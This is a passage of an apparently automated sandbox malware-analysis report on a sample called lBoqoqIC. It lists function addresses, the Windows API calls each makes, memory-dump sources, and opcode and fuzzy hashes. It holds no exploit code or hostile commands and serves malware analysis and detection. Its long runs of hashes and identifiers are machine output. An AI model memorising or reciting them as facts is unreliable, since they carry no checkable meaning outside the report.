                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$DestroyLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 588275208-0
                                                                                                                • Opcode ID: 7596b89a4ac6685dfe2e65d1b7070ce6ed25e47a6a922e6c9adf3a707fe9cf7e
                                                                                                                • Instruction ID: d61048c68c926c68c87fccef6c954df2096ca217fb81c488b69ed57e012997c5
                                                                                                                • Opcode Fuzzy Hash: 7596b89a4ac6685dfe2e65d1b7070ce6ed25e47a6a922e6c9adf3a707fe9cf7e
                                                                                                                • Instruction Fuzzy Hash: A4118275210105AFDB148F65DC94EAF7BAAEF98360F15812BF90587321CA76DC118B64
                                                                                                                Function 004A1B40 Relevance: 3.0, APIs: 2, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsDBCSLeadByte.KERNEL32(?,00000520,00000000,00000318,00000000,0049DC32,00000318,?), ref: 004A1B77
                                                                                                                • CharNextA.USER32(0049DC32,00000520,00000000,00000318,00000000,0049DC32,00000318,?), ref: 004A1B85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharLeadNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 355553264-0
                                                                                                                • Opcode ID: 0b585c19c1f17b3c79c4eede2cf6a4295fe31d7208090836c4f875d0e2a1137e
                                                                                                                • Instruction ID: 7d0b4f533633722eeaa6b2e6c3a9dd2063a8f8406fbcfbad09d5a4e03fbfca2a
                                                                                                                • Opcode Fuzzy Hash: 0b585c19c1f17b3c79c4eede2cf6a4295fe31d7208090836c4f875d0e2a1137e
                                                                                                                • Instruction Fuzzy Hash: 2401D1265083D15ED7314E2868803A7FB98DFA3760F1949AAD8D047312E329AC838378
                                                                                                                Function 004A2ED0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNEL32(?,00000003,?,00000003,?,00000000,00000000,?,0049AAF3,?,?,?,00000000), ref: 004A2EFB
                                                                                                                • GetLastError.KERNEL32(?,0049AAF3,?,?,?,00000000), ref: 004A2F08
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2976181284-0
                                                                                                                • Opcode ID: 011817d680a07016599c923c392f012f9f1d92304430de7705fdf715e6d14444
                                                                                                                • Instruction ID: da774e8cb40b7fe18e89592d26cfb6ca631a2fe726475d28e1a5b4cdcc89719c
                                                                                                                • Opcode Fuzzy Hash: 011817d680a07016599c923c392f012f9f1d92304430de7705fdf715e6d14444
                                                                                                                • Instruction Fuzzy Hash: D2F081B63092006FE2049A68EC859ABB3E9EBD5775F20473EFA62C32D0D670DC055665
                                                                                                                Function 004C6692 Relevance: 3.0, APIs: 2, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004C93E0: GetWindowLongA.USER32(?,000000F0), ref: 004C93EC
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004C66B7
                                                                                                                • GetWindow.USER32(?,00000004), ref: 004C66D4
                                                                                                                  • Part of subcall function 004C95B9: IsWindowEnabled.USER32(?), ref: 004C95C3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnabledLongRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 3170195891-0
                                                                                                                • Opcode ID: e6d1df4fc1382f8c0332352642908a55bb69ef6ce2d489ae355611488e8aeef2
                                                                                                                • Instruction ID: fd826403f20ec6389762a7305b0bd4351d0fc9adc732706f39b1088a3d3a0057
                                                                                                                • Opcode Fuzzy Hash: e6d1df4fc1382f8c0332352642908a55bb69ef6ce2d489ae355611488e8aeef2
                                                                                                                • Instruction Fuzzy Hash: 8E0184387002059BDF61AF61CA64F6F77A5AF10358F01885EED429B291EB38DC00C668
                                                                                                                Function 004CD9EE Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetWindowTextLengthA.USER32(00000000), ref: 004CDA08
                                                                                                                • GetWindowTextA.USER32(00000000,00000000,00000000), ref: 004CDA1D
                                                                                                                  • Part of subcall function 004C6329: lstrlen.KERNEL32(?,00000100,004C9C79,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,00000000,?), ref: 004C633C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TextWindow$Lengthlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 288803333-0
                                                                                                                • Opcode ID: b38a4bb9bf78475ef3ded1ac0204fc2644870eb7dba677f497783ee05b0d3a80
                                                                                                                • Instruction ID: e1b5fbcc3e1111d2872de857b9de04189cceb9ef679f4868b63b038d2f50684f
                                                                                                                • Opcode Fuzzy Hash: b38a4bb9bf78475ef3ded1ac0204fc2644870eb7dba677f497783ee05b0d3a80
                                                                                                                • Instruction Fuzzy Hash: 50F0E93A100159ABCB40AF52DC44FBF776DEF49360B04413EF91587191CB399811C7A9
                                                                                                                Function 004D49CF Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000000,00000000,004CBEC9,00000000,00000000,00000000,00000000,?,00000000,?,004C2313,00000000,00000000,00000000,00000000,004B2186), ref: 004D49D8
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,00000000,?,004C2313,00000000,00000000,00000000,00000000,004B2186,00000000), ref: 004D49DF
                                                                                                                  • Part of subcall function 004D4A32: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 004D4A63
                                                                                                                  • Part of subcall function 004D4A32: lstrcpy.KERNEL32(?,.HLP), ref: 004D4B04
                                                                                                                  • Part of subcall function 004D4A32: lstrcat.KERNEL32(?,.INI), ref: 004D4B31
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3389432936-0
                                                                                                                • Opcode ID: c9567e00202a23653ca7e555a588791f8f0db10986032ccc8e5d3993d9d71554
                                                                                                                • Instruction ID: 5f34fff93e48106a80729249c7f530408dda51ae4c301dc0d1a33f189421b435
                                                                                                                • Opcode Fuzzy Hash: c9567e00202a23653ca7e555a588791f8f0db10986032ccc8e5d3993d9d71554
                                                                                                                • Instruction Fuzzy Hash: CCF08CB49046104FCB00EF20D4A4F093BE4AF44710F01845FF4448B362CB78D841CB5A
                                                                                                                Function 004C585E Relevance: 3.0, APIs: 2, Instructions: 31fileCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004C5879
                                                                                                                • GetLastError.KERNEL32(?), ref: 004C5886
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 442123175-0
                                                                                                                • Opcode ID: 982c89bf41ad4b3189721bff9bc1bcfb0905ca11f4943eabdd457442c4cfa451
                                                                                                                • Instruction ID: 011f2d30777749891f3d8bbf250d1a46daed55c4344793b43b5b6ab847c33618
                                                                                                                • Opcode Fuzzy Hash: 982c89bf41ad4b3189721bff9bc1bcfb0905ca11f4943eabdd457442c4cfa451
                                                                                                                • Instruction Fuzzy Hash: 2FF0A73A100A047BCB216B85DC04F4FBBA9EF91770F10C13FBA2885160CB35E9508B64
                                                                                                                Function 004B6F3A Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • HeapCreate.KERNEL32(00000000,00001000,00000000,004B2104,00000001), ref: 004B6F4B
                                                                                                                  • Part of subcall function 004B6DF2: GetVersionExA.KERNEL32 ref: 004B6E11
                                                                                                                • HeapDestroy.KERNEL32 ref: 004B6F8A
                                                                                                                  • Part of subcall function 004B6F97: RtlAllocateHeap.NTDLL(00000000,00000140,004B6F73), ref: 004B6FA4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocateCreateDestroyVersion
                                                                                                                • String ID:
                                                                                                                • API String ID: 760317429-0
                                                                                                                • Opcode ID: 5f85c7bd0e2b06d2dcd447206a911433d14e56062852781c3ed8f1b87946df93
                                                                                                                • Instruction ID: b8a29b2b52fc4ddf012faa311b5a1862a9b0048150e2d7c54d17f65751942478
                                                                                                                • Opcode Fuzzy Hash: 5f85c7bd0e2b06d2dcd447206a911433d14e56062852781c3ed8f1b87946df93
                                                                                                                • Instruction Fuzzy Hash: E5F065717183419EDB302F70BC457BA3A94DB60795F12843BF404C81D5EF6CD981A52A
                                                                                                                Function 0049D390 Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000000,0049F319,00000318), ref: 0049D397
                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,08000080,00000000), ref: 0049D3C1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFileValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3000843052-0
                                                                                                                • Opcode ID: 67d416e1a07b03122cc92354712e76691c6601da34141375a080b3cb754bc8d9
                                                                                                                • Instruction ID: dc1f9dcab5cc13101ea670c0f268a5cad9757dc8d0d3b17dd442b0a026beffae
                                                                                                                • Opcode Fuzzy Hash: 67d416e1a07b03122cc92354712e76691c6601da34141375a080b3cb754bc8d9
                                                                                                                • Instruction Fuzzy Hash: 7DE068327507116BE230433CFC64F8A3689EB84761F21C224F620FE1C4D634DC804344
                                                                                                                Function 004CAB00 Relevance: 3.0, APIs: 2, Instructions: 27threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004CAB13
                                                                                                                • SetWindowsHookExA.USER32(000000FF,004CAE55,00000000,00000000), ref: 004CAB23
                                                                                                                  • Part of subcall function 004D490D: __EH_prolog.LIBCMT ref: 004D4912
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentH_prologHookThreadWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 2183259885-0
                                                                                                                • Opcode ID: af1e34c570a1da68fc2c23ceebe490edfe04ac604522e3e7e75a9dd09ef282d8
                                                                                                                • Instruction ID: 37c16390faca1b4e6f10ab57e999845035e4b5278c65232c6a57163af0d49269
                                                                                                                • Opcode Fuzzy Hash: af1e34c570a1da68fc2c23ceebe490edfe04ac604522e3e7e75a9dd09ef282d8
                                                                                                                • Instruction Fuzzy Hash: 51F082715406946BCB607F71AC2AF193AA0AF10729F01066FF2524B2E2C76C9940CB5B
                                                                                                                Function 0049FA70 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,?,0049AAFB,?,?,?,?,?,?,?,?,?,?,?,0049F866,?), ref: 0049FA79
                                                                                                                • ReadFile.KERNEL32(?,?,00000001,?,00000000,?,0049AAFB), ref: 0049FA98
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileReadValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 2860046521-0
                                                                                                                • Opcode ID: a86b410373b842a9c788e6e6f6168c218b996033f111a17d364c24d1c2dc5772
                                                                                                                • Instruction ID: 6cba04c3e874008857a5394001e16ee8edd6e0a43882ea4fc03c115469f4046c
                                                                                                                • Opcode Fuzzy Hash: a86b410373b842a9c788e6e6f6168c218b996033f111a17d364c24d1c2dc5772
                                                                                                                • Instruction Fuzzy Hash: 85F065726102426FDF109B64DC45F6737A8AB60B01F44857CB428CB6C1E778D808C765
                                                                                                                Function 0049ACB0 Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000000,0049DC48), ref: 0049ACB7
                                                                                                                • CreateFileA.KERNEL32(00008CFC,80000000,00000003,00000000,00000003,08000080,00000000), ref: 0049ACE6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFileValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3000843052-0
                                                                                                                • Opcode ID: 00a1aced428e33b8c9bf64ccbe972bdc7f1acf1109be55be31e8bdf0978d0b3c
                                                                                                                • Instruction ID: 27020070b2c1442189f93f6e0c94d6e52f1d45ddb1cf345ba94711b8e9d3d12c
                                                                                                                • Opcode Fuzzy Hash: 00a1aced428e33b8c9bf64ccbe972bdc7f1acf1109be55be31e8bdf0978d0b3c
                                                                                                                • Instruction Fuzzy Hash: EEE026315407216BE6305738BC55F863B54AB00760F110629FA60BE2C0CA70A4008788
                                                                                                                Function 004C58A9 Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,?,004E6854,00406F01,?,00000000,00000000), ref: 004C58B7
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 004C58C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2976181284-0
                                                                                                                • Opcode ID: ff19c99bd0e27b813d38a4d4c1a9d0f383d4934bf95273af270cba9e66993c9a
                                                                                                                • Instruction ID: 9bce92ec945830d31791b470d560346077600908fb45730b1236fb09c61f13d9
                                                                                                                • Opcode Fuzzy Hash: ff19c99bd0e27b813d38a4d4c1a9d0f383d4934bf95273af270cba9e66993c9a
                                                                                                                • Instruction Fuzzy Hash: E5D0A7365046207BCA513BB49C49F8EBE90FB25371F118A3DF6659A1E1C731CC619B98
                                                                                                                Function 10004C80 Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNEL32(100040CD,?,100040CD,00000000,00000000,00000000,?,?,00000000,?,?,?,?,1001C05C,1001C030), ref: 10004C86
                                                                                                                • SetFileAttributesA.KERNEL32(100040CD,00000000,?,100040CD,00000000,00000000,00000000,?,?,00000000,?,?,?,?,1001C05C,1001C030), ref: 10004C98
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: 965fe75719236561c027a04be8b47c47cb6aacf50e22d189703d1f752b462730
                                                                                                                • Instruction ID: 3bdeccfd03354401d6354b205c07cff06f8a8f85657d9b59d1fb268bfddc9e0b
                                                                                                                • Opcode Fuzzy Hash: 965fe75719236561c027a04be8b47c47cb6aacf50e22d189703d1f752b462730
                                                                                                                • Instruction Fuzzy Hash: A2C012B140011CFBEB025B20DC48CA93F69EB193B1B108221F829800B0CB32DDA29AA4
                                                                                                                Function 0049D3E0 Relevance: 2.5, APIs: 2, Instructions: 21COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000000,0049F621), ref: 0049D3E7
                                                                                                                • CloseHandle.KERNEL32(?), ref: 0049D406
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
